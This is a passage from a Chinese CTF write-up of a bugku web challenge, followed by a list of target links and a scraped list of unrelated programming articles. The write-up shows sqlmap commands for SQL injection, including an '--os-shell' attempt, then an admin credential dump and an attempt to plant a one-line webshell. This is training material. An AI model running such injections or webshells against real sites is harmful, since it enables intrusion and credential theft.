python sqlmap.py -r "C:\Users\Passerby\Desktop\CTF\bugku\bugku导航\bp.txt" -p username

![zxsq-anti-bbcode-Alt text](https://i.loli.net/2018/06/17/5b26127f136d6.png)

上webshell：

python sqlmap.py -r "C:\Users\Passerby\Desktop\CTF\bugku\bugku导航\bp.txt" -p username --os-shell

但是都上传失败了...没爆出网站路径

不过我爆了一下敏感数据，拿到了后台管理员账号：

https://i.loli.net/2018/06/17/5b2612953b3a6.png

后台有很多图片上传的地方，不过上传成功后，都会被改名成.png

找到了个添加广告的地方，随便插了一个一句话木马：

https://i.loli.net/2018/06/17/5b2612a9a8ece.png

插入失败了，又是sql...

试试这样：

https://i.loli.net/2018/06/17/5b2612c4cd1d4.png

没找到广告插在哪个页面了....

后来，扫了一下备份文件，把他源码下下来了。flag在根目录。

[zxsq-anti-bbcode-1]:http://103.238.227.13:10088/

[zxsq-anti-bbcode-2]:http://www.bugku.com/forum.php?mod=viewthread&tid=93&extra=page%3D1%26filter%3Dtypeid%26typeid%3D26

[zxsq-anti-bbcode-3]:http://120.24.86.145:8002/web15/

[zxsq-anti-bbcode-4]:http://120.24.86.145:8007/web2/index.php

[zxsq-anti-bbcode-5]:https://github.com/lijiejie/ds_store_exp

[zxsq-anti-bbcode-6]:https://cirt.net/nikto2

[zxsq-anti-bbcode-7]:http://120.24.86.145:8002/web16/

[zxsq-anti-bbcode-8]:https://coding.net/u/yihangwang/p/SourceLeakHacker/git?public=true

[zxsq-anti-bbcode-9]:http://120.24.86.145:8002/web9/

[zxsq-anti-bbcode-10]:http://118.89.219.210:49166/

[zxsq-anti-bbcode-11]:http://120.24.86.145:9001/sql/

[zxsq-anti-bbcode-12]:http://120.24.86.145:8005/post/

[zxsq-anti-bbcode-13]:http://118.89.219.210:49163/

[zxsq-anti-bbcode-14]:http://120.24.86.145:8002/web8

[zxsq-anti-bbcode-15]:http://120.24.86.145:8006/test1/

[zxsq-anti-bbcode-16]:http://120.24.86.145:8003/

[zxsq-anti-bbcode-17]:http://120.24.86.145:8002/chengjidan/

[zxsq-anti-bbcode-18]:http://120.24.86.145:8002/web7/

[zxsq-anti-bbcode-19]:http://120.24.86.145:8010/

[zxsq-anti-bbcode-20]:http://118.89.219.210:49162/

[zxsq-anti-bbcode-21]:http://120.24.86.145:8002/qiumingshan/

[zxsq-anti-bbcode-22]:http://120.24.86.145:8002/web6/

[zxsq-anti-bbcode-23]:http://120.24.86.145:9009/1.php

[zxsq-anti-bbcode-24]:http://120.24.86.145:9009/6.php

[zxsq-anti-bbcode-25]:http://120.24.86.145:9009/10.php

[zxsq-anti-bbcode-26]:http://120.24.86.145:9009/19.php

[zxsq-anti-bbcode-27]:http://120.24.86.145:8002/flagphp/

[zxsq-anti-bbcode-28]:http://www.kabelindo.co.id

[zxsq-anti-bbcode-29]:http://123.206.31.85:1001/

[zxsq-anti-bbcode-30]:http://120.24.86.145:8001

[zxsq-anti-bbcode-31]:http://120.24.86.145:9008/

[zxsq-anti-bbcode-32]:http://120.24.86.145:8008

[zxsq-anti-bbcode-33]:http://120.24.86.145:9009/md5.php

[zxsq-anti-bbcode-34]:http://120.24.86.145:9006/

[zxsq-anti-bbcode-35]:http://120.24.86.145:9009/22.php

[zxsq-anti-bbcode-36]:http://120.24.86.145:9009/7.php

[zxsq-anti-bbcode-37]:http://120.24.86.145:9009/20.php

[zxsq-anti-bbcode-38]:http://120.24.86.145:9009/5.php

[zxsq-anti-bbcode-39]:http://120.24.86.145:9009/15.php

[zxsq-anti-bbcode-40]:http://120.24.86.145:9009/21.php

[zxsq-anti-bbcode-41]:http://120.24.86.145:9002/

你可能感兴趣的:(mysql,%3c%3e语句优化)

机器学习与深度学习间关系与区别 ℒℴѵℯ心·动ꦿ໊ོ꫞ 人工智能学习深度学习 python
一、机器学习概述定义机器学习（MachineLearning,ML）是一种通过数据驱动的方法，利用统计学和计算算法来训练模型，使计算机能够从数据中学习并自动进行预测或决策。机器学习通过分析大量数据样本，识别其中的模式和规律，从而对新的数据进行判断。其核心在于通过训练过程，让模型不断优化和提升其预测准确性。主要类型1.监督学习（SupervisedLearning）监督学习是指在训练数据集中包含输入
mysql禁用远程登录 igotyback mysql
去mysql库中的user表里，将host都改成localhost之后刷新权限FLUSHPRIVILEGES;
网易严选官方旗舰店，优质商品，卓越服务高省_飞智666600
网易严选官方旗舰店是网易旗下的一家电商平台，以提供优质商品和卓越服务而闻名。作为一名SEO优化师，我将为您详细介绍网易严选官方旗舰店，并重点强调其特点和优势。大家好！我是高省APP最大团队&联合创始人飞智导师。相较于其他返利app，高省APP的佣金更高，模式更好，最重要的是，终端用户不会流失！高省APP佣金更高，模式更好，终端用户不流失。【高省】是一个自用省钱佣金高，分享推广赚钱多的平台，百度有几
基于社交网络算法优化的二维最大熵图像分割智能算法研学社（Jack旭）智能优化算法应用图像分割算法 php 开发语言
智能优化算法应用：基于社交网络优化的二维最大熵图像阈值分割-附代码文章目录智能优化算法应用：基于社交网络优化的二维最大熵图像阈值分割-附代码1.前言2.二维最大熵阈值分割原理3.基于社交网络优化的多阈值分割4.算法结果：5.参考文献：6.Matlab代码摘要：本文介绍基于最大熵的图像分割，并且应用社交网络算法进行阈值寻优。1.前言阅读此文章前，请阅读《图像分割：直方图区域划分及信息统计介绍》htt
SQL Server_查询某一数据库中的所有表的内容 qq_42772833 SQL Server 数据库 sqlserver
1.查看所有表的表名要列出CrabFarmDB数据库中的所有表（名），可以使用以下SQL语句：USECrabFarmDB;--切换到目标数据库GOSELECTTABLE_NAMEFROMINFORMATION_SCHEMA.TABLESWHERETABLE_TYPE='BASETABLE';对这段SQL脚本的解释：SELECTTABLE_NAME：这个语句的作用是从查询结果中选择TABLE_NAM
MYSQL面试系列-04 king01299 面试 mysql 面试
MYSQL面试系列-0417.关于redolog和binlog的刷盘机制、redolog、undolog作用、GTID是做什么的？innodb_flush_log_at_trx_commit及sync_binlog参数意义双117.1innodb_flush_log_at_trx_commit该变量定义了InnoDB在每次事务提交时，如何处理未刷入（flush）的重做日志信息（redolog）。它
ARM驱动学习之5 LEDS驱动 JT灬新一嵌入式 C 底层 arm开发学习单片机
ARM驱动学习之5LEDS驱动知识点：•linuxGPIO申请函数和赋值函数–gpio_request–gpio_set_value•三星平台配置GPIO函数–s3c_gpio_cfgpin•GPIO配置输出模式的宏变量–S3C_GPIO_OUTPUT注意点：DRIVER_NAME和DEVICE_NAME匹配。实现步骤：1.加入需要的头文件：//Linux平台的gpio头文件#include//三
【PG】常见数据库、表属性设置江无羡数据库
PG的常见属性配置方法数据库复制、备份相关表的复制标识单表操作批量表操作链接数据库复制、备份相关表的复制标识单表操作通过ALTER语句单独更改一张表的复制标识。ALTERTABLE[tablename]REPLICAIDENTITYFULL;批量表操作通过代码块的方式，对某个schema中的所有表一起更新其复制标识。SELECTtablename,CASErelreplidentWHEN'd'TH
Rust基础知识 GRKF15 rust 开发语言后端
1.Rust语言简介1.1基础语法变量声明：let关键字用于声明变量，可以指定或不指定类型，如leta=10;和letmutc=30i32;。函数定义：使用fn关键字定义函数，并指定参数类型及返回类型，如fnadd(i:i32,j:i32)->i32{i+j}。控制流：包括if、else等，控制语句后需要使用;来结束语句。1.2数据类型整数类型：i8、i16、i32、i64、i128，以及无符号的
关于Mysql 中 Row size too large (＞ 8126) 错误的解决和理解秋刀prince mysql mysql 数据库
提示：啰嗦一嘴，数据库的任何操作和验证前，一定要记得先备份！！！不会有错；文章目录问题发现一、问题导致的可能原因1、页大小2、行格式2.1compact格式2.2Redundant格式2.3Dynamic格式2.4Compressed格式3、BLOB和TEXT列二、解决办法1、修改页大小（不推荐）2、修改行格式3、修改数据类型为BLOB和TEXT列4、其他优化方式（可以参考使用）4.1合理设置数据
Java企业面试题3 马龙强_ java
1.break和continue的作用(智*图)break：用于完全退出一个循环（如for,while）或一个switch语句。当在循环体内遇到break语句时，程序会立即跳出当前循环体，继续执行循环之后的代码。continue：用于跳过当前循环体中剩余的部分，并开始下一次循环。如果是在for循环中使用continue，则会直接进行条件判断以决定是否执行下一轮循环。2.if分支语句和switch分
白骑士的Java教学基础篇 2.5 控制流语句白骑士所长 Java 教学 java 开发语言
欢迎继续学习Java编程的基础篇！在前面的章节中，我们了解了Java的变量、数据类型和运算符。接下来，我们将探讨Java中的控制流语句。控制流语句用于控制程序的执行顺序，使我们能够根据特定条件执行不同的代码块，或重复执行某段代码。这是编写复杂程序的基础。通过学习这一节内容，你将掌握如何使用条件语句和循环语句来编写更加灵活和高效的代码。条件语句条件语句用于根据条件的真假来执行不同的代码块。if语句‘
python语法——三目运算符 HappyRocking python python 三目运算符
在java中，有三目运算符，如：intc=(a>b)?a:b表示c取两者中的较大值。但是在python，不能直接这样使用，估计是因为冒号在python有分行的关键作用。那么在python中，如何实现类似功能呢？可以使用ifelse语句，也是一行可以完成，格式为：aifbelsec表示如果b为True，则表达式等于a，否则等于c。如：c=(aif(a>b)elseb)同样是完成了取最大值的功能。
第二十 python基础--语句九樱MOL
目录具体内容1：if语句的使用格式判断语句2：if-else的使用格式3：if-elif-else的使用格式4：if嵌套1：while循环的格式循环语句2：while循环嵌套3：for循环的格式一、判断语句在程序中如果某些条件满足，才能做某件事情，而不满足时不允许做，这就是所谓的判断1.1if语句的使用格式if要判断的条件:条件成立时，要做的事情案例:判断年纪，如果age大于18，输入成年age=
系统架构设计师需求分析篇二 AmHardy 软件架构设计师系统架构需求分析面向对象分析分析模型 UML和SysML
面向对象分析方法1.用例模型构建用例模型一般需要经历4个阶段：识别参与者：识别与系统交互的所有事物。合并需求获得用例：将需求分配给予其相关的参与者。细化用例描述：详细描述每个用例的功能。调整用例模型：优化用例之间的关系和结构，前三个阶段是必需的。2.用例图的三元素参与者：使用系统的用户或其他外部系统和设备。用例：系统所提供的服务。通信关联：参与者和用例之间的关系，或用例与用例之间的关系。3.识别参
MongoDB知识概括 GeorgeLin98 持久层 mongodb
MongoDB知识概括MongoDB相关概念单机部署基本常用命令索引-IndexSpirngDataMongoDB集成副本集分片集群安全认证MongoDB相关概念业务应用场景：传统的关系型数据库（如MySQL），在数据操作的“三高”需求以及应对Web2.0的网站需求面前，显得力不从心。解释：“三高”需求：①Highperformance-对数据库高并发读写的需求。②HugeStorage-对海量数
matlab mle 优化,MLE+: Matlab Toolbox for Integrated Modeling, Control and Optimization for Buildings... Simon Zhong matlab mle 优化
摘要：FollowingunilateralopticnervesectioninadultPVGhoodedrat,theaxonguidancecueephrin-A2isup-regulatedincaudalbutnotrostralsuperiorcolliculus(SC)andtheEphA5receptorisdown-regulatedinaxotomisedretinalgan
Python入门之Lesson2:Python基础语法小熊同学哦 Python入门课程 python 开发语言算法数据结构青少年编程
目录前言一.介绍1.变量和数据类型2.常见运算符3.输入输出4.条件语句5.循环结构二.练习三.总结前言欢迎来到《Python入门》系列博客的第二课。在上一课中，我们了解了Python的安装及运行环境的配置。在这一课中，我们将深入学习Python的基础语法，这是编写Python代码的根基。通过本节内容的学习，你将掌握变量、数据类型、运算符、输入输出、条件语句等Python编程的基础知识。一.介绍1
Android应用性能优化轻口味 Android
Android手机由于其本身的后台机制和硬件特点，性能上一直被诟病，所以软件开发者对软件本身的性能优化就显得尤为重要；本文将对Android开发过程中性能优化的各个方面做一个回顾与总结。Cache优化ListView缓存：ListView中有一个回收器，Item滑出界面的时候View会回收到这里，需要显示新的Item的时候，就尽量重用回收器里面的View；每次在getView函数中inflate新
《 C++ 修炼全景指南：九》打破编程瓶颈！掌握二叉搜索树的高效实现与技巧 Lenyiin C++修炼全景指南技术指南 c++算法 stl
摘要本文详细探讨了二叉搜索树（BinarySearchTree,BST）的核心概念和技术细节，包括插入、查找、删除、遍历等基本操作，并结合实际代码演示了如何实现这些功能。文章深入分析了二叉搜索树的性能优势及其时间复杂度，同时介绍了前驱、后继的查找方法等高级功能。通过自定义实现的二叉搜索树类，读者能够掌握其实际应用，此外，文章还建议进一步扩展为平衡树（如AVL树、红黑树）以优化极端情况下的性能退化。
入门MySQL——查询语法练习 K_un
前言：前面几篇文章为大家介绍了DML以及DDL语句的使用方法，本篇文章将主要讲述常用的查询语法。其实MySQL官网给出了多个示例数据库供大家实用查询，下面我们以最常用的员工示例数据库为准，详细介绍各自常用的查询语法。1.员工示例数据库导入官方文档员工示例数据库介绍及下载链接：https://dev.mysql.com/doc/employee/en/employees-installation.h
博客网站制作教程 2401_85194651 java maven
首先就是技术框架：后端：Java+SpringBoot数据库：MySQL前端：Vue.js数据库连接：JPA(JavaPersistenceAPI)1.项目结构blog-app/├──backend/│├──src/main/java/com/example/blogapp/││├──BlogApplication.java││├──config/│││└──DatabaseConfig.java
matlab delsat = setdiff(1:69,unique(Eph(30,:)))；语句含义黄卷青灯77 matlab 开发语言 setdiff
这行MATLAB代码用于计算在范围1:69中不包含在Eph矩阵第30行的唯一值集合中的所有元素。具体解释如下：delsat=setdiff(1:69,unique(Eph(30,:)));解释Eph(30,:)Eph(30,:)提取矩阵Eph的第30行的所有列元素。这是一个行向量，包含了第30行的所有值。unique(Eph(30,:))unique函数返回Eph(30,:)中的唯一元素。这意味着
ubuntu安装wordpress lissettecarlr
1安装nginx网上安装方式很多，这就就直接用apt-get了apt-getinstallnginx不用启动啥，然后直接在浏览器里面输入IP:80就能看到nginx的主页了。如果修改了一些配置可以使用下列命令重启一下systemctlrestartnginx.service2安装mysql输入安装前也可以更新一下软件源，在安装过程中将会让你输入数据库的密码。sudoapt-getinstallmy
深入浅出 -- 系统架构之负载均衡Nginx的性能优化 xiaoli8748_软件开发系统架构系统架构负载均衡 nginx
一、Nginx性能优化到这里文章的篇幅较长了，最后再来聊一下关于Nginx的性能优化，主要就简单说说收益最高的几个优化项，在这块就不再展开叙述了，毕竟影响性能都有多方面原因导致的，比如网络、服务器硬件、操作系统、后端服务、程序自身、数据库服务等，对于性能调优比较感兴趣的可以参考之前《JVM性能调优》中的调优思想。优化一：打开长连接配置通常Nginx作为代理服务，负责分发客户端的请求，那么建议开启H
我的一个小心愿，减肥20斤，有人一起吗张晓晓ZXX
我现在体重141斤，163cm，想减到120以内，不想吃减肥药，不喝奶昔，也不想买健身卡，就是希望通过一些运动的aPP进行训练和适当的节食，有人一起的吗？3月12号，我73公斤，现在70.9公斤，是通过咕咚app训练来的，但一个人太孤单，有一起的吗？我想知道除了小时候坚持一个月练习写字帖把字写好了，还能做什么锻炼一下自己的毅力，我也想知道100天之后，我能不能也达到理想的体重。接下来100天，愿意
粒子群优化 (PSO) 在三维正弦波函数中的应用 subject625Ruben 机器学习人工智能 matlab 算法
在这篇博客中，我们将展示如何使用粒子群优化（PSO）算法求解三维正弦波函数，并通过增加正弦波扰动，使优化过程更加复杂和有趣。本文将介绍目标函数的定义、PSO参数设置以及算法执行的详细过程，并展示搜索空间中的动态过程和收敛曲线。1.目标函数定义我们使用的目标函数是一个三维正弦波函数，定义如下：objectiveFunc=@(x)sin(sqrt(x(1).^2+x(2).^2))+0.5*sin(5
计算机毕业设计PHP仓储综合管理系统（源码+程序+VUE+lw+部署） java毕设程序源码王哥 php 课程设计 vue.js
该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置：phpStudy+Vscode+Mysql5.7+HBuilderX+Navicat11+Vue+Express。项目技术：原生PHP++Vue等等组成，B/S模式+Vscode管理+前后端分离等等。环境需要1.运行环境：最好是小皮phpstudy最新版，我们在这个版本上开发的。其他版本理论上也可以。2.开发
补充元象二面 Redstone Monstrosity 前端面试
1.请尽可能详细地说明，防抖和节流的区别，应用场景？你的回答中不要写出示例代码。防抖（Debounce）和节流（Throttle）是两种常用的前端性能优化技术，它们的主要区别在于如何处理高频事件的触发。以下是防抖和节流的区别和应用场景的详细说明：防抖和节流的定义防抖：在一段时间内，多次执行变为只执行最后一次。防抖的原理是，当事件被触发后，设置一个延迟定时器。如果在这个延迟时间内事件再次被触发，则重
自动写论文的网站推荐这5款实用类工具小猪包333 写论文人工智能深度学习计算机视觉 AI写作
在当今学术研究和写作领域，AI论文写作工具的出现极大地提高了写作效率和质量。这些工具不仅能够帮助研究人员快速生成论文草稿，还能进行内容优化、查重和排版等操作。以下是五款实用类工具推荐，特别是千笔-AIPassPaper。1.千笔-AIPassPaper千笔-AIPassPaper是一款功能强大且全面的AI论文写作助手，用户只需输入基本的研究需求和关键词，便能迅速生成一篇完整的论文。该工具利用先进的
Java 并发包之线程池和原子计数 lijingyao8206 Java计数 ThreadPool 并发包 java线程池
对于大数据量关联的业务处理逻辑，比较直接的想法就是用JDK提供的并发包去解决多线程情况下的业务数据处理。线程池可以提供很好的管理线程的方式，并且可以提高线程利用率，并发包中的原子计数在多线程的情况下可以让我们避免去写一些同步代码。这里就先把jdk并发包中的线程池处理器ThreadPoolExecutor 以原子计数类AomicInteger 和倒数计时锁C
java编程思想抽象类和接口百合不是茶 java 抽象类接口
接口c++对接口和内部类只有简介的支持,但在java中有队这些类的直接支持 1 ,抽象类 : 如果一个类包含一个或多个抽象方法,该类必须限定为抽象类(否者编译器报错) 抽象方法 : 在方法中仅有声明而没有方法体 package com.wj.Interface;
[房地产与大数据]房地产数据挖掘系统 comsci 数据挖掘
随着一个关键核心技术的突破,我们已经是独立自主的开发某些先进模块,但是要完全实现,还需要一定的时间... 所以,除了代码工作以外,我们还需要关心一下非技术领域的事件..比如说房地产 &nb
数组队列总结沐刃青蛟数组队列
数组队列是一种大小可以改变，类型没有定死的类似数组的工具。不过与数组相比，它更具有灵活性。因为它不但不用担心越界问题，而且因为泛型（类似c++中模板的东西）的存在而支持各种类型。以下是数组队列的功能实现代码： import List.Student; public class
Oracle存储过程无法编译的解决方法 IT独行者 oracle 存储过程　
今天同事修改Oracle存储过程又导致2个过程无法被编译，流程规范上的东西，Dave 这里不多说，看看怎么解决问题。 1. 查看无效对象 XEZF@xezf(qs-xezf-db1)> select object_name,object_type,status from all_objects where status='IN
重装系统之后oracle恢复文强chu oracle
前几天正在使用电脑，没有暂停oracle的各种服务。突然win8.1系统奔溃，无法修复，开机时系统提示正在搜集错误信息，然后再开机，再提示的无限循环中。无耐我拿出系统u盘准备重装系统，没想到竟然无法从u盘引导成功。晚上到外面早了一家修电脑店，让人家给装了个系统，并且那哥们在我没反应过来的时候，直接把我的c盘给格式化了并且清理了注册表，再装系统。然后的结果就是我的oracl
python学习二（一些基础语法）小桔子 pthon 基础语法
紧接着把！昨天没看继续看django 官方教程，学了下python的基本语法与c类语言还是有些小差别： 1.ptyhon的源文件以UTF-8编码格式 2. / 除结果浮点型 // 除结果整形 % 除取余数 * 乘 ** 乘方 eg 5**2 结果是5的2次方25 _&
svn 常用命令 aichenglong SVN 版本回退
1 svn回退版本 1)在window中选择log,根据想要回退的内容,选择revert this version或revert chanages from this version 两者的区别: revert this version:表示回退到当前版本(该版本后的版本全部作废) revert chanages from this versio
某小公司面试归来 alafqq 面试
先填单子，还要写笔试题，我以时间为急，拒绝了它。。时间宝贵。老拿这些对付毕业生的东东来吓唬我。。面试官很刁难，问了几个问题，记录下； 1，包的范围。。。public,private,protect. --悲剧了 2，hashcode方法和equals方法的区别。谁覆盖谁.结果，他说我说反了。 3，最恶心的一道题，抽象类继承抽象类吗？（察，一般它都是被继承的啊） 4，stru
动态数组的存储速度比较集合框架百合不是茶集合框架
集合框架：自定义数据结构(增删改查等) package 数组; /** * 创建动态数组 * @author 百合 * */ public class ArrayDemo{ //定义一个数组来存放数据 String[] src = new String[0]; /** * 增加元素加入容器 * @param s要加入容器
用JS实现一个JS对象，对象里有两个属性一个方法 bijian1013 js对象
<html> <head> </head> <body> 用js代码实现一个js对象，对象里有两个属性，一个方法 </body> <script> var obj={a:'1234567',b:'bbbbbbbbbb',c:function(x){
探索JUnit4扩展：使用Rule bijian1013 java 单元测试 JUnit Rule
在上一篇文章中，讨论了使用Runner扩展JUnit4的方式，即直接修改Test Runner的实现(BlockJUnit4ClassRunner)。但这种方法显然不便于灵活地添加或删除扩展功能。下面将使用JUnit4.7才开始引入的扩展方式——Rule来实现相同的扩展功能。 1. Rule &n
[Gson一]非泛型POJO对象的反序列化 bit1129 POJO
当要将JSON数据串反序列化自身为非泛型的POJO时，使用Gson.fromJson(String, Class)方法。自身为非泛型的POJO的包括两种： 1. POJO对象不包含任何泛型的字段 2. POJO对象包含泛型字段，例如泛型集合或者泛型类 Data类 a.不是泛型类， b.Data中的集合List和Map都是泛型的 c.Data中不包含其它的POJO
【Kakfa五】Kafka Producer和Consumer基本使用 bit1129 kafka
0.Kafka服务器的配置一个Broker，一个Topic Topic中只有一个Partition（） 1. Producer： package kafka.examples.producers; import kafka.producer.KeyedMessage; import kafka.javaapi.producer.Producer; impor
lsyncd实时同步搭建指南——取代rsync+inotify ronin47
1. 几大实时同步工具比较 1.1 inotify + rsync 最近一直在寻求生产服务服务器上的同步替代方案，原先使用的是 inotify + rsync，但随着文件数量的增大到100W+，目录下的文件列表就达20M，在网络状况不佳或者限速的情况下，变更的文件可能10来个才几M，却因此要发送的文件列表就达20M，严重减低的带宽的使用效率以及同步效率；更为要紧的是，加入inotify
java-9. 判断整数序列是不是二元查找树的后序遍历结果 bylijinnan java
public class IsBinTreePostTraverse{ static boolean isBSTPostOrder(int[] a){ if(a==null){ return false; } /*1.只有一个结点时，肯定是查找树 *2.只有两个结点时，肯定是查找树。例如{5,6}对应的BST是 6 {6,5}对应的BST是
MySQL的sum函数返回的类型 bylijinnan java spring sql mysql jdbc
今天项目切换数据库时，出错访问数据库的代码大概是这样： String sql = "select sum(number) as sumNumberOfOneDay from tableName"; List<Map> rows = getJdbcTemplate().queryForList(sql); for (Map row : rows
java设计模式之单例模式 chicony java设计模式
在阎宏博士的《JAVA与模式》一书中开头是这样描述单例模式的：　　作为对象的创建模式，单例模式确保某一个类只有一个实例，而且自行实例化并向整个系统提供这个实例。这个类称为单例类。单例模式的结构　　单例模式的特点：单例类只能有一个实例。单例类必须自己创建自己的唯一实例。单例类必须给所有其他对象提供这一实例。　　饿汉式单例类 publ
javascript取当月最后一天 ctrain JavaScript
 <script language=javascript> var current = new Date(); var year = current.getYear(); var month = current.getMonth(); showMonthLastDay(year, mont
linux tune2fs命令详解 daizj linux tune2fs 查看系统文件块信息
一.简介： tune2fs是调整和查看ext2/ext3文件系统的文件系统参数，Windows下面如果出现意外断电死机情况，下次开机一般都会出现系统自检。Linux系统下面也有文件系统自检，而且是可以通过tune2fs命令，自行定义自检周期及方式。二.用法： Usage: tune2fs [-c max_mounts_count] [-e errors_behavior] [-g grou
做有中国特色的程序员 dcj3sjt126com 程序员
从出版业说起网络作品排到靠前的，都不会太难看，一般人不爱看某部作品也是因为不喜欢这个类型，而此人也不会全不喜欢这些网络作品。究其原因，是因为网络作品都是让人先白看的，看的好了才出了头。而纸质作品就不一定了，排行榜靠前的，有好作品，也有垃圾。许多大牛都是写了博客，后来出了书。这些书也都不次，可能有人让为不好，是因为技术书不像小说，小说在读故事，技术书是在学知识或温习知识，有
Android：TextView属性大全 dcj3sjt126com textview
android:autoLink 设置是否当文本为URL链接/email/电话号码/map时，文本显示为可点击的链接。可选值(none/web/email/phone/map/all) android:autoText 如果设置，将自动执行输入值的拼写纠正。此处无效果，在显示输入法并输
tomcat虚拟目录安装及其配置 eksliang tomcat配置说明 tomca部署web应用 tomcat虚拟目录安装
转载请出自出处：http://eksliang.iteye.com/blog/2097184 1.-------------------------------------------tomcat 目录结构 config：存放tomcat的配置文件 temp ：存放tomcat跑起来后存放临时文件用的 work ：当第一次访问应用中的jsp
浅谈：APP有哪些常被黑客利用的安全漏洞 gg163 APP
首先，说到APP的安全漏洞，身为程序猿的大家应该不陌生；如果抛开安卓自身开源的问题的话，其主要产生的原因就是开发过程中疏忽或者代码不严谨引起的。但这些责任也不能怪在程序猿头上，有时会因为BOSS时间催得紧等很多可观原因。由国内移动应用安全检测团队爱内测（ineice.com）的CTO给我们浅谈关于Android 系统的开源设计以及生态环境。 1. 应用反编译漏洞：APK 包非常容易被反编译成可读
C#根据网址生成静态页面 hvt Web .net C#asp.net hovertree
HoverTree开源项目中HoverTreeWeb.HVTPanel的Index.aspx文件是后台管理的首页。包含生成留言板首页，以及显示用户名，退出等功能。根据网址生成页面的方法： bool CreateHtmlFile(string url, string path) { //http://keleyi.com/a/bjae/3d10wfax.htm stri
SVG 教程（一）天梯梦 svg
SVG 简介 SVG 是使用 XML 来描述二维图形和绘图程序的语言。学习之前应具备的基础知识：继续学习之前，你应该对以下内容有基本的了解： HTML XML 基础如果希望首先学习这些内容，请在本站的首页选择相应的教程。什么是SVG？ SVG 指可伸缩矢量图形 (Scalable Vector Graphics) SVG 用来定义用于网络的基于矢量
一个简单的java栈 luyulong java 数据结构栈
public class MyStack { private long[] arr; private int top; public MyStack() { arr = new long[10]; top = -1; } public MyStack(int maxsize) { arr = new long[maxsize]; top
基础数据结构和算法八：Binary search sunwinner Algorithm Binary search
Binary search needs an ordered array so that it can use array indexing to dramatically reduce the number of compares required for each search, using the classic and venerable binary search algori
12个C语言面试题，涉及指针、进程、运算、结构体、函数、内存，看看你能做出几个！刘星宇 c 面试
12个C语言面试题，涉及指针、进程、运算、结构体、函数、内存，看看你能做出几个！ 1.gets()函数问：请找出下面代码里的问题： #include<stdio.h> int main(void) { char buff[10]; memset(buff,0,sizeof(buff));
ITeye 7月技术图书有奖试读获奖名单公布 ITeye管理员活动 ITeye 试读
ITeye携手人民邮电出版社图灵教育共同举办的7月技术图书有奖试读活动已圆满结束，非常感谢广大用户对本次活动的关注与参与。 7月试读活动回顾： http://webmaster.iteye.com/blog/2092746 本次技术图书试读活动的优秀奖获奖名单及相应作品如下（优秀文章有很多，但名额有限，没获奖并不代表不优秀）：《Java性能优化权威指南》

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他